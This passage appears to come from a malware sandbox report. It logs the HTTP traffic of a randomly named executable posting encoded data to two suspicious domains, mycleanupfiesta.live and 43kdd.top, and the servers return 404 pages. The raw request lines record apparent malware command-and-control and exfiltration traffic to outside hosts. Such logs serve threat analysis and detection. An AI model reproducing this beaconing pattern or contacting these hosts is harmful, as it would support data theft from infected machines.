                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449830172.67.137.238804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:14.977797031 CET821OUTPOST /a9if/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.mycleanupfiesta.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.mycleanupfiesta.live
                                                                    Referer: http://www.mycleanupfiesta.live/a9if/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 41 4e 71 6c 33 33 77 2f 70 44 61 52 6f 36 2b 4c 61 6e 46 46 44 2f 68 4d 52 7a 59 43 37 30 6c 2f 42 6c 74 6c 62 56 59 6c 39 2f 4f 79 48 61 4a 2b 50 55 4b 61 72 4d 34 6e 74 30 76 39 7a 46 39 6e 67 6e 6c 65 72 35 70 39 64 46 78 32 31 2f 41 6f 59 78 71 52 4d 50 4d 71 39 57 56 61 62 6c 6e 6a 53 4f 51 66 70 49 32 66 77 33 6e 4a 33 37 4c 79 34 6c 4d 59 52 31 39 79 72 4a 32 76 46 39 44 73 65 45 6b 78 41 58 62 2b 77 44 76 49 30 7a 48 6e 47 63 4e 66 49 63 53 41 52 59 33 34 68 53 6e 32 63 2f 43 6a 50 31 57 48 36 37 75 50 52 39 43 4a 58 65 71 77 30 4c 50 44 42 7a 45 6c 59 35 62 47 7a 41 3d 3d
                                                                    Data Ascii: C0oD=ANql33w/pDaRo6+LanFFD/hMRzYC70l/BltlbVYl9/OyHaJ+PUKarM4nt0v9zF9ngnler5p9dFx21/AoYxqRMPMq9WVablnjSOQfpI2fw3nJ37Ly4lMYR19yrJ2vF9DseEkxAXb+wDvI0zHnGcNfIcSARY34hSn2c/CjP1WH67uPR9CJXeqw0LPDBzElY5bGzA==
                                                                    Nov 12, 2024 18:48:15.751185894 CET991INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:15 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lMfD4dmSAij7CsFoQtV6hEVIYyzYCKNbYhMRwHnuQpyBj1KqcyemsjQ1mXn%2BWy0M8h855PnOFqxZBB0abFxjqsFetWCLhOOKnYEfOADa%2FkfnaIeAf3pCjyMz%2Bd3cCHfLa7w%2Bv7d7X6a0sek%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185a152952e767-DEN
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=19140&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=821&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449845172.67.137.238804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:17.525497913 CET841OUTPOST /a9if/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.mycleanupfiesta.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.mycleanupfiesta.live
                                                                    Referer: http://www.mycleanupfiesta.live/a9if/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 41 4e 71 6c 33 33 77 2f 70 44 61 52 70 61 75 4c 64 45 74 46 47 66 67 2b 64 54 59 43 78 55 6c 7a 42 69 6c 6c 62 57 56 2b 39 4e 61 79 45 2b 4e 2b 4f 56 4b 61 73 4d 34 6e 69 55 75 35 74 31 38 4b 67 6e 34 72 72 37 39 39 64 46 6c 32 31 2f 77 6f 59 43 79 57 4f 66 4d 6f 77 32 56 63 55 46 6e 6a 53 4f 51 66 70 49 69 31 77 32 50 4a 33 4c 37 79 35 41 34 5a 53 31 39 78 71 4a 32 76 53 74 44 6f 65 45 6b 70 41 57 57 52 77 42 6e 49 30 7a 33 6e 47 4e 4e 63 47 63 53 38 4f 49 33 70 77 67 57 44 62 50 66 62 41 6a 61 6e 69 35 32 51 5a 62 50 54 47 76 4c 6e 6d 4c 72 77 63 30 4e 52 56 36 6d 50 6f 4e 67 61 53 48 6e 36 62 4d 35 37 6b 70 37 59 4e 64 46 56 2b 34 77 3d
                                                                    Data Ascii: C0oD=ANql33w/pDaRpauLdEtFGfg+dTYCxUlzBillbWV+9NayE+N+OVKasM4niUu5t18Kgn4rr799dFl21/woYCyWOfMow2VcUFnjSOQfpIi1w2PJ3L7y5A4ZS19xqJ2vStDoeEkpAWWRwBnI0z3nGNNcGcS8OI3pwgWDbPfbAjani52QZbPTGvLnmLrwc0NRV6mPoNgaSHn6bM57kp7YNdFV+4w=
                                                                    Nov 12, 2024 18:48:18.257158995 CET1005INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:18 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2B5bRQeBwN6Fb6UcAghnxtkktft6eztthSjyKjYk4RnZP0aJN%2FYWmQzQvRVA%2BYvS%2Bp%2FOyXXChQT2JIVqCaClOQ1%2BcFEzDFyJZly1SXV6Nd0jNGc628ABUBniOdao6BNVKx6ObwzGw9nBfvE%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185a24e958e751-DEN
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=19003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=841&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 61 39 0d 0a 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: fa9L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449861172.67.137.238804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:20.074323893 CET10923OUTPOST /a9if/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.mycleanupfiesta.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.mycleanupfiesta.live
                                                                    Referer: http://www.mycleanupfiesta.live/a9if/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 41 4e 71 6c 33 33 77 2f 70 44 61 52 70 61 75 4c 64 45 74 46 47 66 67 2b 64 54 59 43 78 55 6c 7a 42 69 6c 6c 62 57 56 2b 39 4e 69 79 48 4c 5a 2b 49 32 53 61 74 4d 34 6e 76 30 75 36 74 31 39 49 67 6e 77 6e 72 37 78 48 64 48 64 32 30 64 34 6f 61 7a 79 57 48 66 4d 6f 76 6d 56 64 62 6c 6d 68 53 4f 41 6c 70 49 79 31 77 32 50 4a 33 4a 6a 79 77 31 4d 5a 65 56 39 79 72 4a 32 72 46 39 44 55 65 45 38 35 41 57 53 37 77 77 48 49 7a 54 6e 6e 56 50 6c 63 4b 63 53 45 4e 49 32 30 77 67 61 71 62 50 79 69 41 6a 47 42 69 37 71 51 63 39 36 54 66 74 54 74 6b 4c 37 4b 4f 45 42 78 4d 4b 79 36 6d 76 4d 2b 54 45 37 6d 4a 76 78 30 67 34 4f 49 51 73 5a 42 71 49 31 30 57 4b 67 52 74 77 55 59 6c 36 43 56 30 54 67 64 4d 59 66 65 5a 54 4d 74 42 41 70 33 78 47 41 55 6f 5a 71 75 74 2f 72 37 37 7a 51 42 56 6b 43 64 33 4a 51 54 4e 43 76 52 4b 50 72 7a 4f 62 38 4a 31 52 69 4d 56 61 52 72 75 51 31 57 50 6e 31 35 4c 37 58 76 47 50 47 39 65 52 31 57 6f 62 32 7a 78 31 42 69 42 53 50 6b 6a 59 34 7a 72 56 73 54 34 65 43 74 62 [TRUNCATED]
                                                                    Data Ascii: C0oD=ANql33w/pDaRpauLdEtFGfg+dTYCxUlzBillbWV+9NiyHLZ+I2SatM4nv0u6t19Ignwnr7xHdHd20d4oazyWHfMovmVdblmhSOAlpIy1w2PJ3Jjyw1MZeV9yrJ2rF9DUeE85AWS7wwHIzTnnVPlcKcSENI20wgaqbPyiAjGBi7qQc96TftTtkL7KOEBxMKy6mvM+TE7mJvx0g4OIQsZBqI10WKgRtwUYl6CV0TgdMYfeZTMtBAp3xGAUoZqut/r77zQBVkCd3JQTNCvRKPrzOb8J1RiMVaRruQ1WPn15L7XvGPG9eR1Wob2zx1BiBSPkjY4zrVsT4eCtbDjAnqgfci6iWQ8p/dohPGn6Ej81O4tEzpmIiNoNFL70g4RA4mSKihNOOjdNLMdvkLvXKs412BIjQBrVA13ytSSBj/RUxpq3LFfIytFkpkW8v7YYF55rzrjQ5fkFAlLRX1YK6aKk/Y4G7iOFZtH4qnXSt11T/aVA4XOzAN6TAQiC+JZf5nuuR9q4tU4QVx87EnXZqBiU/Vh8VwGbIF/66Gad2iGQhygxzUk9EnYAsYWODDYKM62mkns3VR/sp4NJd61cD3x4uQKfxSvDs+6Hj2l9e8Y7pk0TqQqRcL8glMovD20naU3eu00kr6HlYjKFeArrqeZD1W2r5/qdyXoXxN3m+KzWTmw8lIIES2S3Hp0CYCY/lJpBAcNjRlCqTGWDXDi6rEq46CvV+E1QgJmBwnkpUYsQR8T682xjG3oU/XtHArNZziJFJC54SDXYSn5F7VbgVc85u2Gsp77pidAklRiaeOo47yiTWldeSJXc9WOheiBwSn3UHgEj1WLPu1l4doFjrc8Rc0OmPzv/4JRIMjJsM3oH2wcU/GN6Q5o4a0tLptYhVhGDYMvp97C1vrOogPisyhyWofUzZi/wrL8/uvMdu8rrFWWEd4B61rzFzwwbhy++pA5gxOdiZh3+imll5NUEvwkxGK8oodbhuuqGH7FNECKoyPdui5x [TRUNCATED]
                                                                    Nov 12, 2024 18:48:20.825866938 CET1001INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:20 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha4kIMHB%2FLrrbGm6D96uxCjsFDZo3ZLo9tMi5v0RTj5kA%2FJ6OegYePIOFQuDW4b1553oiKEJs24hMv3es%2BPgry%2Bvr6AR49gTJtaQULo6FUxOHnydkdEpfmr0I5FPO9V7%2B7NS56PWfI9gsFQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185a34dbfae75f-DEN
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=18775&sent=6&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10923&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a8L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qFb|<0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.449876172.67.137.238804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:22.805389881 CET546OUTGET /a9if/?SJLty=7Zsl8bAHqdkHEnH&C0oD=NPCF0Cc5uwbi+9CdLylAZ+4kLxMnwTwBBFY+WmZ6z4eVD7VdFSaEtftDik7huU9slgF1galMdGpPyLMnTxOlI51ovglTUHTdL9cfhIyo0GaR7r/EyDMZf0s= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.mycleanupfiesta.live
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:48:23.537311077 CET977INHTTP/1.1 404 Not Found
                                                                    Date: Tue, 12 Nov 2024 17:48:23 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9bLPAXvneoM6hF5mnagOFvcmsoG5mvdf80GryTXjc2RMaOi%2BNC3fZr40f1L9zl3YtD5xFGv5lRA9Xq0d%2Fe1z4%2F979aEYba2rK0RR7JdSRTKgeQqDBkYLnICkz6WUoUfkFFU71STrskczGYg%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8e185a45f918e73b-DEN
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=18690&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                    Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                    Nov 12, 2024 18:48:23.537611961 CET5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.44990838.47.232.202804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:28.617837906 CET788OUTPOST /6iur/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.43kdd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.43kdd.top
                                                                    Referer: http://www.43kdd.top/6iur/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 35 6c 6b 70 66 59 33 30 31 51 66 42 73 39 7a 65 45 6f 71 68 36 31 54 54 4d 30 36 46 42 37 43 39 56 58 4e 46 6e 77 39 4a 67 68 62 7a 78 43 50 4d 6f 63 7a 62 6e 34 2f 2f 4c 35 55 69 67 59 6a 72 79 2b 7a 34 30 72 65 63 76 32 31 36 6e 42 51 76 5a 50 44 4b 4c 43 78 33 6a 4a 73 48 42 4b 7a 75 61 31 59 4b 7a 4f 39 4a 53 65 2b 42 34 75 30 68 72 38 48 39 4b 36 6b 76 51 59 47 46 4e 77 6c 6b 57 78 4a 79 34 5a 58 62 7a 38 45 42 76 69 78 75 44 63 45 4e 7a 61 6c 4b 64 67 65 38 56 6b 4f 4e 6f 52 34 53 78 6f 44 51 43 7a 77 5a 6d 4a 57 48 41 6b 49 78 38 73 4c 49 69 76 71 43 78 6c 6a 31 67 41 3d 3d
                                                                    Data Ascii: C0oD=5lkpfY301QfBs9zeEoqh61TTM06FB7C9VXNFnw9JghbzxCPMoczbn4//L5UigYjry+z40recv216nBQvZPDKLCx3jJsHBKzua1YKzO9JSe+B4u0hr8H9K6kvQYGFNwlkWxJy4ZXbz8EBvixuDcENzalKdge8VkONoR4SxoDQCzwZmJWHAkIx8sLIivqCxlj1gA==
                                                                    Nov 12, 2024 18:48:29.595937014 CET312INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:48:29 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 148
                                                                    Connection: close
                                                                    ETag: "66df9b06-94"
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.44992338.47.232.202804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:31.164441109 CET808OUTPOST /6iur/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.43kdd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.43kdd.top
                                                                    Referer: http://www.43kdd.top/6iur/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 35 6c 6b 70 66 59 33 30 31 51 66 42 74 65 72 65 66 4c 43 68 74 6c 54 4d 51 6b 36 46 50 62 43 78 56 58 78 46 6e 78 4a 5a 67 54 2f 7a 78 69 2f 4d 70 64 7a 62 72 59 2f 2f 44 5a 55 6a 75 34 6a 69 79 2b 76 77 30 76 43 63 76 32 78 36 6e 46 63 76 5a 2b 44 4e 4b 53 78 70 6c 4a 73 42 66 36 7a 75 61 31 59 4b 7a 4f 5a 6a 53 66 61 42 34 65 45 68 71 59 54 2b 48 61 6b 75 48 6f 47 46 48 67 6c 67 57 78 4a 71 34 61 54 31 7a 2b 4d 42 76 6e 4e 75 44 49 6f 4b 34 61 6c 4d 58 41 66 78 52 58 6e 48 71 44 35 49 37 35 69 72 47 53 4d 74 6e 50 62 64 52 56 70 6d 75 73 76 37 2f 6f 6a 32 38 6d 65 38 37 48 57 4e 42 44 2b 43 47 63 38 31 7a 75 71 6a 52 34 4d 41 79 63 59 3d
                                                                    Data Ascii: C0oD=5lkpfY301QfBterefLChtlTMQk6FPbCxVXxFnxJZgT/zxi/MpdzbrY//DZUju4jiy+vw0vCcv2x6nFcvZ+DNKSxplJsBf6zua1YKzOZjSfaB4eEhqYT+HakuHoGFHglgWxJq4aT1z+MBvnNuDIoK4alMXAfxRXnHqD5I75irGSMtnPbdRVpmusv7/oj28me87HWNBD+CGc81zuqjR4MAycY=
                                                                    Nov 12, 2024 18:48:32.109539986 CET312INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:48:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 148
                                                                    Connection: close
                                                                    ETag: "66df9b06-94"
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.44993938.47.232.202804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:33.727041960 CET10890OUTPOST /6iur/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.43kdd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.43kdd.top
                                                                    Referer: http://www.43kdd.top/6iur/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
